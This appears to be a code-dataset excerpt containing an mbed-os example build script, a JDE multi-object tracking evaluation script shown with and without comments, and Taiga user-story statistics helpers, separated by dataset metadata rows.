    """Run ``mbed-cli deploy`` in each filtered example directory.

    Returns the first non-zero mbed-cli exit status, 1 when a filtered
    example directory is missing, or 0 on success.

    NOTE(review): the "Skipping..." log message contradicts the ``return 1``
    that follows it -- a missing directory actually aborts the whole run
    with a failure code instead of being skipped.  Confirm intent before
    changing either the message or the return.
    """
    print("\nDeploying example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                cmd = "mbed-cli deploy"
                logging.info("Executing command '%s'..." % cmd)
                result = subprocess.call(cmd, shell=True)
                os.chdir(CWD)
                if result:
                    logging.error("mbed-cli deploy command failed for '%s'" % name)
                    return result
            else:
                logging.info("'%s' example directory doesn't exist. Skipping..." % name)
                return 1
    return 0
def export_repos(config, ides, targets, exp_filter):
    """Export (and, where supported, build) each filtered example for each valid (target, IDE) pair.

    Returns a dict mapping example name -> [exported, pass_status, successes,
    export_failures, build_failures, build_skips], where each list entry is a
    {"name", "target", "ide"} summary dict.
    """
    results = {}
    print("\nExporting example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        export_failures = []
        build_failures = []
        build_skips = []
        successes = []
        exported = True
        pass_status = True
        if example['export']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, IDE, and features combinations are valid and return a
                # list of valid combinations to work through
                for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
                                                    valid_choices(example['exporters'], ides),
                                                    example['features'], example['toolchains']):
                    example_summary = {"name" : name, "target" : target, "ide" : ide }
                    summary_string = "%s %s %s" % (name, target, ide)
                    logging.info("Exporting %s" % summary_string)
                    cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
                    logging.info("Executing command '%s'..." % " ".join(cmd))
                    proc = subprocess.Popen(cmd)
                    proc.wait()
                    if proc.returncode:
                        export_failures.append(example_summary)
                        logging.error("FAILURE exporting %s" % summary_string)
                    else:
                        logging.info("SUCCESS exporting %s" % summary_string)
                        logging.info("Building %s" % summary_string)
                        try:
                            if EXPORTERS[ide].build(name, cleanup=False):
                                logging.error("FAILURE building %s" % summary_string)
                                build_failures.append(example_summary)
                            else:
                                logging.info("SUCCESS building %s" % summary_string)
                                successes.append(example_summary)
                        except TypeError:
                            # TypeError presumably means this exporter defines no
                            # headless build step -- recorded as a skip, not a failure.
                            successes.append(example_summary)
                            build_skips.append(example_summary)
                os.chdir(CWD)
            if len(build_failures+export_failures) > 0:
                pass_status= False
        else:
            exported = False
        results[example['name']] = [exported, pass_status, successes,
                                    export_failures, build_failures, build_skips]
    return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
    """Compile each filtered example for every valid (target, toolchain) pair.

    Uses ``mbed-tools`` when *cmake* is true, otherwise ``mbed-cli``.  For
    examples with testing enabled, the built image is recorded into a
    greentea-style test specification written to test_spec.json.

    Returns a dict mapping example name -> [compiled, pass_status,
    successes, failures] of summary dicts.
    """
    results = {}
    test_json = {"builds":{}}
    base_path = os.getcwd()
    print("\nCompiling example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        failures = []
        successes = []
        compiled = True
        pass_status = True
        if example['test']:
            # Testing requires both keys; silently downgrade to compile-only otherwise.
            if not ('baud_rate' in example and 'compare_log'in example):
                logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
                example['test'] = False
        if example['compile']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, toolchain and features combinations are valid and return a
                # list of valid combinations to work through
                for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
                                                                valid_choices(example['toolchains'], toolchains),
                                                                example['features']):
                    example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
                    summary_string = "%s %s %s" % (name, target, toolchain)
                    logging.info("Compiling %s" % summary_string)
                    if cmake:
                        build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
                    else:
                        build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
                    if profiles:
                        for profile in profiles:
                            build_command_seq[0] += " --profile {}".format(profile)
                    failed_flag = False
                    for build_command in build_command_seq:
                        logging.info("Executing command '%s'..." % build_command)
                        proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        std_out, std_err = proc.communicate()
                        std_out = std_out.decode()
                        std_err = std_err.decode()
                        print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
                        if proc.returncode:
                            failures.append(example_summary)
                            failed_flag = True
                            break
                    if not failed_flag:
                        if example['test']:
                            log = example['compare_log'].pop(0)
                            # example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
                            # pop the log file out of list regardless the compilation for each example pass of fail
                            image = fetch_output_image(std_out,cmake)
                            if image:
                                image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
                                test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
                                if not test_group in test_json['builds']:
                                    test_json['builds'][test_group] = {
                                        "platform":target ,
                                        "toolchain": toolchain ,
                                        "base_path": base_path ,
                                        "baud_rate": int(example['baud_rate']),
                                        "tests":{} }
                                test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
                                example_summary["test"] = "TEST_ON"
                            else:
                                logging.warning("could not find built image for example %s" % name)
                                example_summary["test"] = "NO_IMAGE"
                        else:
                            logging.warning("Test for %s will not be generated." % name)
                            example_summary["test"] = "TEST_OFF"
                        successes.append(example_summary)
                os.chdir(CWD)
            # If there are any compilation failures for the example 'set' then the overall status is fail.
            if len(failures) > 0:
                pass_status = False
        else:
            compiled = False
        results[example['name']] = [compiled, pass_status, successes, failures]
    write_json_to_file(test_json, "test_spec.json")
    return results
def update_example_version(config, tag, exp_filter):
    """Switch every filtered example repo onto the branch named by *tag*.

    Assumes each example repo has already been cloned.  Returns the first
    non-zero git exit status encountered, or 0 when all checkouts succeed.
    """
    print("\nUpdating example to version(branch) '%s'\n" % tag)
    for example in config['examples']:
        repo_name = example['name']
        if repo_name not in exp_filter:
            continue
        os.chdir(repo_name)
        logging.info("In folder '%s'" % repo_name)
        checkout_cmd = "git checkout -B %s origin/%s" % (tag, tag)
        logging.info("Executing command '%s'..." % checkout_cmd)
        status = subprocess.call(checkout_cmd, shell=True)
        os.chdir(CWD)
        if status:
            return status
    return 0
def symlink_mbedos(config, path, exp_filter):
    """Create a symbolic link named 'mbed-os' in each example folder, pointing at *path*.

    Any existing 'mbed-os.lib' is truncated to an empty file (not deleted),
    since CMake-based builds still require it to exist.  Always returns 0.
    """
    print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        for name in get_sub_examples_list(example):
            os.chdir(name)
            logging.info("In folder '%s'" % name)
            if os.path.exists("mbed-os.lib"):
                # Truncate rather than delete: build tools expect the file to exist.
                logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
                open("mbed-os.lib", 'w').close()
            else:
                logging.warning("No 'mbed-os.lib' found in '%s'" % name)
            if os.path.exists("mbed-os"):
                # Leave an existing checkout/link untouched.
                logging.warning("'mbed-os' already existed in '%s'" % name)
            else:
                logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
                os.symlink(path, "mbed-os")
            #Cmake tool currently require 'mbed-os.lib' to be present to perform build.
            #Add a empty 'mbed-os.lib' as a workaround
            open('mbed-os.lib', 'a').close()
            os.chdir(CWD)
    return 0
def fetch_output_image(output, cmake):
    """Search the last 30 lines of a build log for the produced image path.

    Returns the image path (relative for the mbed-tools/CMake log format)
    when the file exists on disk, otherwise False.
    """
    log_lines = output.splitlines()
    stop = -31 if len(log_lines) > 29 else (-1 - len(log_lines))
    for idx in range(-1, stop, -1):
        line = log_lines[idx]
        if cmake:
            if line.startswith("-- built:") and line.endswith(".bin"):
                candidate = line[10:]
                print("IMAGE is " + candidate)
                if os.path.isfile(candidate):
                    return os.path.relpath(candidate)
        elif line.startswith("Image:"):
            candidate = line[7:]
            if os.path.isfile(candidate):
                return candidate
    return False
| true | true |
f72eb9f4639cbc1da62b470e79d10c5da4bfa8a1 | 9,904 | py | Python | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
    """Write tracking results to *filename* in MOT or KITTI text format.

    *results* is an iterable of (frame_id, tlwhs, track_ids) triples;
    entries with a negative track id are skipped.  Raises ValueError for
    an unknown *data_type*.
    """
    formats = {
        'mot': '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n',
        'kitti': '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n',
    }
    if data_type not in formats:
        raise ValueError(data_type)
    save_format = formats[data_type]
    with open(filename, 'w') as out:
        for frame_id, tlwhs, track_ids in results:
            if data_type == 'kitti':
                # KITTI frame numbering starts at 0, ours at 1.
                frame_id -= 1
            for tlwh, track_id in zip(tlwhs, track_ids):
                if track_id < 0:
                    # Negative ids mark unconfirmed tracks; drop them.
                    continue
                x1, y1, w, h = tlwh
                x2, y2 = x1 + w, y1 + h
                out.write(save_format.format(frame=frame_id, id=track_id,
                                             x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h))
    logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
    """Initialise module-level tracking state for per-frame processing.

    Sets up the JDE tracker, a shared timer, and a 1000-slot ring buffer
    (``resultscamera``) holding the most recent per-frame results.
    """
    global tracker,timer,results,frame_id,objopt,resultscamera
    objopt = opt
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    # Ring buffer: slot frame_id % 1000 holds that frame's result tuple.
    resultscamera = [None] * 1000
    frame_id = 0
def conversion_frame(img, img0):
    """Track one frame and return (annotated image, (frame_no, tlwhs, ids)).

    *img* is the preprocessed network input (numpy, moved to CUDA here);
    *img0* is the original frame used for visualisation.  Must be called
    after conversion_frame_init.
    """
    global tracker,timer,resultscamera,frame_id,objopt
    # run tracking
    timer.tic()
    blob = torch.from_numpy(img).cuda().unsqueeze(0)
    online_targets = tracker.update(blob, img0)
    online_tlwhs = []
    online_ids = []
    for t in online_targets:
        tlwh = t.tlwh
        tid = t.track_id
        # Despite the name, this flags boxes wider than 1.6x their height.
        vertical = tlwh[2] / tlwh[3] > 1.6
        if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
            online_tlwhs.append(tlwh)
            online_ids.append(tid)
    timer.toc()
    count = frame_id%1000
    resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
    online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                  fps=1. / timer.average_time)
    frame_id += 1
    return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
    '''
       Processes the video sequence given and provides the output of tracking result (write the results in video file)
       It uses JDE model for getting information about the online targets present.
       Parameters
       ----------
       opt : Namespace
             Contains information passed as commandline arguments.
       dataloader : LoadVideo
                    Instance of LoadVideo class used for fetching the image sequence and associated data.
       data_type : String
                   Type of dataset corresponding(similar) to the given video.
       result_filename : String
                         The name(path) of the file for storing results.
       save_dir : String
                  Path to the folder for storing the frames containing bounding box information (Result frames).
       show_image : bool
                    Option for showing individual frames during run-time.
       frame_rate : int
                    Frame-rate of the given video.
       Returns
       -------
       (frame_id, average time per frame, number of timed calls)
    '''
    if save_dir:
        mkdir_if_missing(save_dir)
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    frame_id = 0
    for path, img, img0 in dataloader:
        if frame_id % 20 == 0:
            logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
        # run tracking
        timer.tic()
        blob = torch.from_numpy(img).cuda().unsqueeze(0)
        online_targets = tracker.update(blob, img0)
        online_tlwhs = []
        online_ids = []
        for t in online_targets:
            tlwh = t.tlwh
            tid = t.track_id
            # Despite the name, this flags boxes wider than 1.6x their height.
            vertical = tlwh[2] / tlwh[3] > 1.6
            if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
                online_tlwhs.append(tlwh)
                online_ids.append(tid)
        timer.toc()
        # save results
        results.append((frame_id + 1, online_tlwhs, online_ids))
        if show_image or save_dir is not None:
            online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                          fps=1. / timer.average_time)
            if show_image:
                cv2.imshow('online_im', online_im)
            if save_dir is not None:
                cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
        frame_id += 1
    # save results
    write_results(result_filename, results, data_type)
    return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
         save_images=False, save_videos=False, show_image=True):
    """Run tracking over each MOT sequence, evaluate with motmetrics, and print/save a summary.

    Results go to <data_root>/../results/<exp_name>/; optional result frames
    and videos go to <data_root>/../outputs/<exp_name>/<seq>/.
    """
    logger.setLevel(logging.INFO)
    result_root = os.path.join(data_root, '..', 'results', exp_name)
    mkdir_if_missing(result_root)
    data_type = 'mot'
    # Read config
    cfg_dict = parse_model_cfg(opt.cfg)
    opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
    # run tracking
    accs = []
    n_frame = 0
    timer_avgs, timer_calls = [], []
    for seq in seqs:
        output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
        logger.info('start seq: {}'.format(seq))
        dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
        result_filename = os.path.join(result_root, '{}.txt'.format(seq))
        # Parse frameRate from seqinfo.ini; assumes the 'frameRate=' key is
        # immediately followed by '\nseqLength' -- TODO confirm for all splits.
        meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
        frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
        nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
                              save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
        n_frame += nf
        timer_avgs.append(ta)
        timer_calls.append(tc)
        # eval
        logger.info('Evaluate seq: {}'.format(seq))
        evaluator = Evaluator(data_root, seq, data_type)
        accs.append(evaluator.eval_file(result_filename))
        if save_videos:
            output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
            cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
            os.system(cmd_str)
    # Overall timing: weighted average over per-sequence averages.
    timer_avgs = np.asarray(timer_avgs)
    timer_calls = np.asarray(timer_calls)
    all_time = np.dot(timer_avgs, timer_calls)
    avg_time = all_time / np.sum(timer_calls)
    logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
    # get summary
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    print(strsummary)
    Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
    # Command-line entry point: parse tracker options, pick the sequence set,
    # and run main() over it.
    parser = argparse.ArgumentParser(prog='track.py')
    parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
    parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
    parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
    parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
    parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
    parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
    parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
    parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
    parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
    parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
    opt = parser.parse_args()
    print(opt, end='\n\n')
    # Default: MOT17 train split (SDP detections); --test-mot16 switches to
    # the MOT16 test split.  Paths are hard-coded to the author's machine.
    if not opt.test_mot16:
        seqs_str = '''MOT17-02-SDP
                      MOT17-04-SDP
                      MOT17-05-SDP
                      MOT17-09-SDP
                      MOT17-10-SDP
                      MOT17-11-SDP
                      MOT17-13-SDP
                      '''
        data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
    else:
        seqs_str = '''MOT16-01
                     MOT16-03
                     MOT16-06
                     MOT16-07
                     MOT16-08
                     MOT16-12
                     MOT16-14'''
        data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
    seqs = [seq.strip() for seq in seqs_str.split()]
    main(opt,
         data_root=data_root,
         seqs=seqs,
         exp_name=opt.weights.split('/')[-2],
         show_image=False,
         save_images=opt.save_images,
         save_videos=opt.save_videos)
| 39.935484 | 119 | 0.601373 | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
    """Write tracking results to *filename* in MOT or KITTI text format."""
    if data_type == 'mot':
        save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
    elif data_type == 'kitti':
        save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
    else:
        raise ValueError(data_type)
    with open(filename, 'w') as f:
        for frame_id, tlwhs, track_ids in results:
            if data_type == 'kitti':
                # KITTI frame numbering starts at 0, ours at 1.
                frame_id -= 1
            for tlwh, track_id in zip(tlwhs, track_ids):
                if track_id < 0:
                    # Negative ids mark unconfirmed tracks; drop them.
                    continue
                x1, y1, w, h = tlwh
                x2, y2 = x1 + w, y1 + h
                line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
                f.write(line)
    logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
    """Initialise module-level tracking state (tracker, timer, ring buffer)."""
    global tracker,timer,results,frame_id,objopt,resultscamera
    objopt = opt
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    # Ring buffer: slot frame_id % 1000 holds that frame's result tuple.
    resultscamera = [None] * 1000
    frame_id = 0
def conversion_frame(img, img0):
    """Track one frame; return (annotated image, (frame_no, tlwhs, ids)).

    Must be called after conversion_frame_init.
    """
    global tracker,timer,resultscamera,frame_id,objopt
    timer.tic()
    blob = torch.from_numpy(img).cuda().unsqueeze(0)
    online_targets = tracker.update(blob, img0)
    online_tlwhs = []
    online_ids = []
    for t in online_targets:
        tlwh = t.tlwh
        tid = t.track_id
        # Despite the name, this flags boxes wider than 1.6x their height.
        vertical = tlwh[2] / tlwh[3] > 1.6
        if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
            online_tlwhs.append(tlwh)
            online_ids.append(tid)
    timer.toc()
    count = frame_id%1000
    resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
    online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                  fps=1. / timer.average_time)
    frame_id += 1
    return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
    """Track every frame from *dataloader*, write results, optionally save/show frames.

    Returns (frame count, average time per frame, number of timed calls).
    """
    if save_dir:
        mkdir_if_missing(save_dir)
    tracker = JDETracker(opt, frame_rate=frame_rate)
    timer = Timer()
    results = []
    frame_id = 0
    for path, img, img0 in dataloader:
        if frame_id % 20 == 0:
            logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
        timer.tic()
        blob = torch.from_numpy(img).cuda().unsqueeze(0)
        online_targets = tracker.update(blob, img0)
        online_tlwhs = []
        online_ids = []
        for t in online_targets:
            tlwh = t.tlwh
            tid = t.track_id
            # Despite the name, this flags boxes wider than 1.6x their height.
            vertical = tlwh[2] / tlwh[3] > 1.6
            if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
                online_tlwhs.append(tlwh)
                online_ids.append(tid)
        timer.toc()
        results.append((frame_id + 1, online_tlwhs, online_ids))
        if show_image or save_dir is not None:
            online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
                                          fps=1. / timer.average_time)
            if show_image:
                cv2.imshow('online_im', online_im)
            if save_dir is not None:
                cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
        frame_id += 1
    write_results(result_filename, results, data_type)
    return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
         save_images=False, save_videos=False, show_image=True):
    """Run tracking over each MOT sequence, evaluate with motmetrics, and print/save a summary."""
    logger.setLevel(logging.INFO)
    result_root = os.path.join(data_root, '..', 'results', exp_name)
    mkdir_if_missing(result_root)
    data_type = 'mot'
    cfg_dict = parse_model_cfg(opt.cfg)
    opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
    accs = []
    n_frame = 0
    timer_avgs, timer_calls = [], []
    for seq in seqs:
        output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
        logger.info('start seq: {}'.format(seq))
        dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
        result_filename = os.path.join(result_root, '{}.txt'.format(seq))
        # Parse frameRate from seqinfo.ini via string slicing -- assumes the
        # key layout 'frameRate=...\nseqLength'.  TODO confirm for all splits.
        meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
        frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
        nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
                              save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
        n_frame += nf
        timer_avgs.append(ta)
        timer_calls.append(tc)
        logger.info('Evaluate seq: {}'.format(seq))
        evaluator = Evaluator(data_root, seq, data_type)
        accs.append(evaluator.eval_file(result_filename))
        if save_videos:
            output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
            cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
            os.system(cmd_str)
    # Overall timing: weighted average over per-sequence averages.
    timer_avgs = np.asarray(timer_avgs)
    timer_calls = np.asarray(timer_calls)
    all_time = np.dot(timer_avgs, timer_calls)
    avg_time = all_time / np.sum(timer_calls)
    logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
    metrics = mm.metrics.motchallenge_metrics
    mh = mm.metrics.create()
    summary = Evaluator.get_summary(accs, seqs, metrics)
    strsummary = mm.io.render_summary(
        summary,
        formatters=mh.formatters,
        namemap=mm.io.motchallenge_metric_names
    )
    print(strsummary)
    Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
    # Command-line entry point: parse tracker options, pick the sequence set,
    # and run main() over it.
    parser = argparse.ArgumentParser(prog='track.py')
    parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
    parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
    parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
    parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
    parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
    parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
    parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
    parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
    parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
    parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
    opt = parser.parse_args()
    print(opt, end='\n\n')
    # Default: MOT17 train split (SDP detections); --test-mot16 switches to
    # the MOT16 test split.  Paths are hard-coded to the author's machine.
    if not opt.test_mot16:
        seqs_str = '''MOT17-02-SDP
                      MOT17-04-SDP
                      MOT17-05-SDP
                      MOT17-09-SDP
                      MOT17-10-SDP
                      MOT17-11-SDP
                      MOT17-13-SDP
                      '''
        data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
    else:
        seqs_str = '''MOT16-01
                     MOT16-03
                     MOT16-06
                     MOT16-07
                     MOT16-08
                     MOT16-12
                     MOT16-14'''
        data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
    seqs = [seq.strip() for seq in seqs_str.split()]
    main(opt,
         data_root=data_root,
         seqs=seqs,
         exp_name=opt.weights.split('/')[-2],
         show_image=False,
         save_images=opt.save_images,
         save_videos=opt.save_videos)
| true | true |
f72ebb099171a1bdd6461c9a7537a443a6f2854c | 3,946 | py | Python | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | taiga_stats/helpers.py | erikw/taiga_stats | 7e28ffff5169707e248be6a4ab6e31326fc2ca85 | [
"BSD-3-Clause"
] | null | null | null | import datetime as dt
import sys
import matplotlib
import taiga_stats.constants as c
matplotlib.use("TkAgg") # Reference: https://stackoverflow.com/a/48374671/265508
DOT_HEADER_FMT = """digraph {:s} {{
labelloc="t";
//labelfontsize="40"
label="{:s}";
//size="7.5,10"
ratio="compress"
//orientation=landscape
"""
def get_tag_str(tag):
    """Return *tag* as a printable suffix; the match-all sentinel maps to ''."""
    if tag == c.TAG_MATCH_ALL:
        return ""
    return tag
def get_stories_with_tag(project, tag):
    """Return the project's user stories carrying *tag* (all of them for the
    match-all sentinel).

    NOTE: when nothing matches, a warning is printed to stderr and the
    whole process exits with status 1 -- this never returns an empty list.
    """
    uss = project.list_user_stories()
    ret_uss = None
    if tag == c.TAG_MATCH_ALL:
        ret_uss = uss
    else:
        ret_uss = []
        for us in uss:
            if us.tags and tag in us.tags:
                ret_uss.append(us)
    if ret_uss is None or len(ret_uss) == 0:
        print(
            "Warning: no userstories matching '{:s}' was found.".format(tag),
            file=sys.stderr,
        )
        sys.exit(1)
    return ret_uss
def get_us_stauts_id_from_name(project, name):
    """Return the id of the user-story status called *name*, or None."""
    for status in project.list_user_story_statuses():
        if status.name == name:
            return status.id
    return None


def get_us_status_name_from_id(project, status_id):
    """Return the display name of the status with id *status_id*, or None."""
    for status in project.list_user_story_statuses():
        if status.id == status_id:
            return status.name
    return None


def remove_closed_stories(_project, uss):
    """Return only the user stories that are still open."""
    return [us for us in uss if not us.is_closed]


def get_statuses_sorted_by_order(project):
    """All user-story statuses, sorted by their board column order."""
    return sorted(project.list_user_story_statuses(), key=lambda s: s.order)


def get_statuses_sorted_by_id(project):
    """All user-story statuses, sorted by their numeric id."""
    return sorted(project.list_user_story_statuses(), key=lambda s: s.id)


def get_status_id_sorted(project):
    """Status ids in board column order."""
    return [s.id for s in get_statuses_sorted_by_order(project)]


def get_status_and_names_sorted(project):
    """Status ids in reversed column order, paired with their names."""
    ids = get_status_id_sorted(project)[::-1]
    names = [get_us_status_name_from_id(project, sid) for sid in ids]
    return ids, names
def get_dot_header(name, title):
    """Return the opening of a Graphviz digraph called *name* titled *title*."""
    return DOT_HEADER_FMT.format(name, title)
def get_dot_footer():
    """Return the closing brace of a Graphviz digraph."""
    return "}"
def read_daily_cfd(path, tag):
    """Read the tab-separated CFD data file for *tag* from *path* into columns.

    Returns a list of column lists: column 0 holds datetimes, column 1 the
    raw annotation strings, remaining columns ints.  The header row is used
    only to size the column list.  Exits with status 2 if the file cannot
    be read.

    NOTE(review): one more column list is allocated than the header has
    fields (``len(parts) + 1``) and it is never filled here -- presumably
    reserved for a series computed by the caller; confirm before removing.
    """
    data_file = c.CFD_DATA_FILE_FMT.format(get_tag_str(tag))
    data_path = "{:s}/{:s}".format(path, data_file)
    data = []
    try:
        with open(data_path, "r", encoding="utf-8") as fdata:
            row = 0
            for line in fdata:
                line = line.rstrip()
                parts = line.split("\t")
                if row == 0:
                    data = [[] for _ in range(len(parts) + 1)]
                else:
                    for col in range(len(parts)):
                        value = parts[col]
                        if col == 0: # First col is dates
                            value = dt.datetime.strptime(value, "%Y-%m-%d")
                        elif col == 1: # Second col is annotations
                            pass
                        else:
                            value = int(value)
                        data[col].append(value)
                row += 1
    except IOError as e:
        print(
            "Could not read {:s}, error: {:s}".format(data_path, str(e)),
            file=sys.stderr,
        )
        sys.exit(2)
    return data
